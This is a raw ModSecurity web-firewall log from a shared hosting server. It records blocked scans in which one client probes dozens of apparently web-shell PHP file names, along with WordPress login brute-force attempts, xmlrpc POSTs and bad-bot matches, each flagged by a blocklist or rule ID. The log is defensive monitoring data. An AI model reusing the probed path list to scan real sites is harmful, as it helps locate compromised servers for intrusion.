[Tue May 26 15:35:56.073877 2026] [security2:error] [pid 724639:tid 724856] [client 185.191.171.11:27706] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-21-25/list/"] [unique_id "ahVwhBKJRbiNp3eWdT2FIwAAANw"]
[Tue May 26 15:35:56.429437 2026] [security2:error] [pid 724639:tid 724849] [client 74.249.173.207:1261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/7.php"] [unique_id "ahVwhBKJRbiNp3eWdT2FLAAAANU"]
[Tue May 26 15:35:56.429550 2026] [security2:error] [pid 724639:tid 724849] [client 74.249.173.207:1261] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/7.php"] [unique_id "ahVwhBKJRbiNp3eWdT2FLAAAANU"]
[Tue May 26 15:35:56.829885 2026] [security2:error] [pid 724639:tid 724825] [client 74.249.173.207:1250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/pp.php"] [unique_id "ahVwhBKJRbiNp3eWdT2FPQAAAL0"]
[Tue May 26 15:35:56.829982 2026] [security2:error] [pid 724639:tid 724825] [client 74.249.173.207:1250] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/pp.php"] [unique_id "ahVwhBKJRbiNp3eWdT2FPQAAAL0"]
[Tue May 26 15:35:57.208144 2026] [security2:error] [pid 724639:tid 724875] [client 74.249.173.207:38172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/mar.php"] [unique_id "ahVwhRKJRbiNp3eWdT2FSgAAAO8"]
[Tue May 26 15:35:57.208303 2026] [security2:error] [pid 724639:tid 724875] [client 74.249.173.207:38172] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/mar.php"] [unique_id "ahVwhRKJRbiNp3eWdT2FSgAAAO8"]
[Tue May 26 15:35:57.628567 2026] [security2:error] [pid 724639:tid 724838] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwhRKJRbiNp3eWdT2FTAAAAMo"]
[Tue May 26 15:35:57.798167 2026] [security2:error] [pid 724639:tid 724894] [client 74.7.230.4:42972] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.bfbminerals.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVwhRKJRbiNp3eWdT2FXQABAgc"]
[Tue May 26 15:35:57.812661 2026] [security2:error] [pid 724639:tid 724857] [client 74.249.173.207:43405] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/themes.php"] [unique_id "ahVwhRKJRbiNp3eWdT2FYgAAAN0"]
[Tue May 26 15:35:57.812747 2026] [security2:error] [pid 724639:tid 724857] [client 74.249.173.207:43405] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/themes.php"] [unique_id "ahVwhRKJRbiNp3eWdT2FYgAAAN0"]
[Tue May 26 15:35:58.301228 2026] [security2:error] [pid 724639:tid 724769] [client 74.249.173.207:37018] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/acp.php"] [unique_id "ahVwhhKJRbiNp3eWdT2FbgAAAIU"]
[Tue May 26 15:35:58.301359 2026] [security2:error] [pid 724639:tid 724769] [client 74.249.173.207:37018] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/acp.php"] [unique_id "ahVwhhKJRbiNp3eWdT2FbgAAAIU"]
[Tue May 26 15:35:59.071174 2026] [security2:error] [pid 724639:tid 724844] [client 74.249.173.207:43397] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/zdd.php"] [unique_id "ahVwhxKJRbiNp3eWdT2FiQAAANA"]
[Tue May 26 15:35:59.071261 2026] [security2:error] [pid 724639:tid 724844] [client 74.249.173.207:43397] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/zdd.php"] [unique_id "ahVwhxKJRbiNp3eWdT2FiQAAANA"]
[Tue May 26 15:35:59.289953 2026] [security2:error] [pid 724639:tid 724883] [client 74.249.173.207:35143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/link.php"] [unique_id "ahVwhxKJRbiNp3eWdT2FjwAAAPc"]
[Tue May 26 15:35:59.290095 2026] [security2:error] [pid 724639:tid 724883] [client 74.249.173.207:35143] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/link.php"] [unique_id "ahVwhxKJRbiNp3eWdT2FjwAAAPc"]
[Tue May 26 15:35:59.870943 2026] [security2:error] [pid 724639:tid 724786] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwhxKJRbiNp3eWdT2FlQAAAJY"]
[Tue May 26 15:36:00.369535 2026] [security2:error] [pid 724639:tid 724769] [client 74.249.173.207:1888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/sallu.php"] [unique_id "ahVwiBKJRbiNp3eWdT2FqwAAAIU"]
[Tue May 26 15:36:00.369653 2026] [security2:error] [pid 724639:tid 724769] [client 74.249.173.207:1888] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/sallu.php"] [unique_id "ahVwiBKJRbiNp3eWdT2FqwAAAIU"]
[Tue May 26 15:36:00.747411 2026] [security2:error] [pid 724639:tid 724891] [client 74.249.173.207:38203] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/aboute.php"] [unique_id "ahVwiBKJRbiNp3eWdT2FvAAAAP8"]
[Tue May 26 15:36:00.747514 2026] [security2:error] [pid 724639:tid 724891] [client 74.249.173.207:38203] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/aboute.php"] [unique_id "ahVwiBKJRbiNp3eWdT2FvAAAAP8"]
[Tue May 26 15:36:01.221644 2026] [security2:error] [pid 724639:tid 724873] [client 74.249.173.207:41860] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/one.php"] [unique_id "ahVwiRKJRbiNp3eWdT2FxwAAAO0"]
[Tue May 26 15:36:01.221752 2026] [security2:error] [pid 724639:tid 724873] [client 74.249.173.207:41860] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/one.php"] [unique_id "ahVwiRKJRbiNp3eWdT2FxwAAAO0"]
[Tue May 26 15:36:01.540727 2026] [security2:error] [pid 724639:tid 724850] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVwiRKJRbiNp3eWdT2F1AAAANY"], referer: https://www.anujtradingco.com/
[Tue May 26 15:36:01.724324 2026] [security2:error] [pid 724639:tid 724795] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwiRKJRbiNp3eWdT2FygAAAJ8"]
[Tue May 26 15:36:02.261887 2026] [security2:error] [pid 724639:tid 724853] [client 74.249.173.207:37024] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/tx79.php"] [unique_id "ahVwihKJRbiNp3eWdT2F5AAAANk"]
[Tue May 26 15:36:02.261969 2026] [security2:error] [pid 724639:tid 724853] [client 74.249.173.207:37024] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/tx79.php"] [unique_id "ahVwihKJRbiNp3eWdT2F5AAAANk"]
[Tue May 26 15:36:02.331280 2026] [security2:error] [pid 724639:tid 724826] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVwihKJRbiNp3eWdT2F5QAAAL4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1287715&moderation-hash=91a889ac70362414dd8d3d7063359890
[Tue May 26 15:36:03.374808 2026] [security2:error] [pid 724639:tid 724896] [client 74.249.173.207:37054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/wp-class.php"] [unique_id "ahVwixKJRbiNp3eWdT2F-wAAAQQ"]
[Tue May 26 15:36:03.374918 2026] [security2:error] [pid 724639:tid 724896] [client 74.249.173.207:37054] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/wp-class.php"] [unique_id "ahVwixKJRbiNp3eWdT2F-wAAAQQ"]
[Tue May 26 15:36:03.476929 2026] [security2:error] [pid 724639:tid 724657] [remote 111.229.10.83:52450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.10.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVwixKJRbiNp3eWdT2F-gABAxE"]
[Tue May 26 15:36:04.013927 2026] [security2:error] [pid 724639:tid 724814] [client 74.249.173.207:1871] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/8.php"] [unique_id "ahVwjBKJRbiNp3eWdT2GCAAAALI"]
[Tue May 26 15:36:04.014053 2026] [security2:error] [pid 724639:tid 724814] [client 74.249.173.207:1871] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/8.php"] [unique_id "ahVwjBKJRbiNp3eWdT2GCAAAALI"]
[Tue May 26 15:36:04.547868 2026] [security2:error] [pid 724639:tid 724774] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwjBKJRbiNp3eWdT2GCwAAAIo"]
[Tue May 26 15:36:04.559389 2026] [security2:error] [pid 724639:tid 724886] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVwjBKJRbiNp3eWdT2GIAAAAPo"], referer: https://anujtradingco.com
[Tue May 26 15:36:05.274526 2026] [security2:error] [pid 724639:tid 724784] [client 74.249.173.207:37535] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/options.php"] [unique_id "ahVwjRKJRbiNp3eWdT2GMwAAAJQ"]
[Tue May 26 15:36:05.274668 2026] [security2:error] [pid 724639:tid 724784] [client 74.249.173.207:37535] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/options.php"] [unique_id "ahVwjRKJRbiNp3eWdT2GMwAAAJQ"]
[Tue May 26 15:36:06.128886 2026] [security2:error] [pid 724639:tid 724853] [client 74.249.173.207:37563] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/f5.php"] [unique_id "ahVwjhKJRbiNp3eWdT2GRgAAANk"]
[Tue May 26 15:36:06.128994 2026] [security2:error] [pid 724639:tid 724853] [client 74.249.173.207:37563] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/f5.php"] [unique_id "ahVwjhKJRbiNp3eWdT2GRgAAANk"]
[Tue May 26 15:36:06.566714 2026] [security2:error] [pid 724639:tid 724836] [client 74.249.173.207:37555] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/alpha.php"] [unique_id "ahVwjhKJRbiNp3eWdT2GVwAAAMg"]
[Tue May 26 15:36:06.566797 2026] [security2:error] [pid 724639:tid 724836] [client 74.249.173.207:37555] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/alpha.php"] [unique_id "ahVwjhKJRbiNp3eWdT2GVwAAAMg"]
[Tue May 26 15:36:06.809372 2026] [security2:error] [pid 724639:tid 724783] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwjhKJRbiNp3eWdT2GTwAAAJM"]
[Tue May 26 15:36:06.955154 2026] [security2:error] [pid 724639:tid 724845] [client 74.7.175.192:43148] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.amslca.com.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVwjhKJRbiNp3eWdT2GZAAA0TM"]
[Tue May 26 15:36:07.064831 2026] [security2:error] [pid 724639:tid 724817] [client 74.249.173.207:37549] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/son1.php"] [unique_id "ahVwjxKJRbiNp3eWdT2GaQAAALU"]
[Tue May 26 15:36:07.064919 2026] [security2:error] [pid 724639:tid 724817] [client 74.249.173.207:37549] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/son1.php"] [unique_id "ahVwjxKJRbiNp3eWdT2GaQAAALU"]
[Tue May 26 15:36:07.513017 2026] [security2:error] [pid 724639:tid 724884] [client 74.249.173.207:41914] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/ggb.php"] [unique_id "ahVwjxKJRbiNp3eWdT2GeAAAAPg"]
[Tue May 26 15:36:07.513125 2026] [security2:error] [pid 724639:tid 724884] [client 74.249.173.207:41914] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/ggb.php"] [unique_id "ahVwjxKJRbiNp3eWdT2GeAAAAPg"]
[Tue May 26 15:36:08.273687 2026] [security2:error] [pid 724639:tid 724863] [client 223.123.38.127:15193] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwjxKJRbiNp3eWdT2GfwAAAOM"]
[Tue May 26 15:36:08.273835 2026] [security2:error] [pid 724639:tid 724863] [client 223.123.38.127:15193] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwjxKJRbiNp3eWdT2GfwAAAOM"]
[Tue May 26 15:36:08.415677 2026] [security2:error] [pid 724639:tid 724860] [client 74.249.173.207:28922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/ss.php"] [unique_id "ahVwkBKJRbiNp3eWdT2GjwAAAOA"]
[Tue May 26 15:36:08.415807 2026] [security2:error] [pid 724639:tid 724860] [client 74.249.173.207:28922] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/ss.php"] [unique_id "ahVwkBKJRbiNp3eWdT2GjwAAAOA"]
[Tue May 26 15:36:08.924704 2026] [security2:error] [pid 724639:tid 724840] [client 74.7.230.0:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "kexcouriers.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVwkBKJRbiNp3eWdT2GpwAAAMw"]
[Tue May 26 15:36:08.927092 2026] [security2:error] [pid 724639:tid 724838] [client 74.7.230.0:34120] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "kexcouriers.com"] [uri "/robots.txt"] [unique_id "ahVwkBKJRbiNp3eWdT2GpQAAykU"]
[Tue May 26 15:36:09.043611 2026] [security2:error] [pid 724639:tid 724829] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwkBKJRbiNp3eWdT2GmAAAAME"]
[Tue May 26 15:36:09.065159 2026] [security2:error] [pid 724639:tid 724882] [client 147.53.122.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVwkRKJRbiNp3eWdT2GqgAAAPY"], referer: https://www.anujtradingco.com/
[Tue May 26 15:36:09.215958 2026] [security2:error] [pid 724639:tid 724891] [client 74.249.173.207:28906] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/rh.php"] [unique_id "ahVwkRKJRbiNp3eWdT2GrgAAAP8"]
[Tue May 26 15:36:09.216067 2026] [security2:error] [pid 724639:tid 724891] [client 74.249.173.207:28906] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/rh.php"] [unique_id "ahVwkRKJRbiNp3eWdT2GrgAAAP8"]
[Tue May 26 15:36:09.472527 2026] [security2:error] [pid 724639:tid 724791] [client 74.249.173.207:28920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/99.php"] [unique_id "ahVwkRKJRbiNp3eWdT2GuAAAAJs"]
[Tue May 26 15:36:09.472655 2026] [security2:error] [pid 724639:tid 724791] [client 74.249.173.207:28920] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/99.php"] [unique_id "ahVwkRKJRbiNp3eWdT2GuAAAAJs"]
[Tue May 26 15:36:10.330461 2026] [security2:error] [pid 724639:tid 724809] [client 74.249.173.207:37522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/layout.php"] [unique_id "ahVwkhKJRbiNp3eWdT2G0gAAAK0"]
[Tue May 26 15:36:10.330581 2026] [security2:error] [pid 724639:tid 724809] [client 74.249.173.207:37522] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/layout.php"] [unique_id "ahVwkhKJRbiNp3eWdT2G0gAAAK0"]
[Tue May 26 15:36:11.363380 2026] [security2:error] [pid 724639:tid 724794] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwkhKJRbiNp3eWdT2G6AAAAJ4"]
[Tue May 26 15:36:13.399147 2026] [security2:error] [pid 724639:tid 724783] [client 147.53.122.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVwlRKJRbiNp3eWdT2HIgAAAJM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1227515&moderation-hash=e82de4888b341ba026f4c3be1e885563
[Tue May 26 15:36:13.665017 2026] [security2:error] [pid 724639:tid 724815] [client 223.109.255.206:39499] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVwlRKJRbiNp3eWdT2HRQAAALM"], referer: http://pic.sogou.com
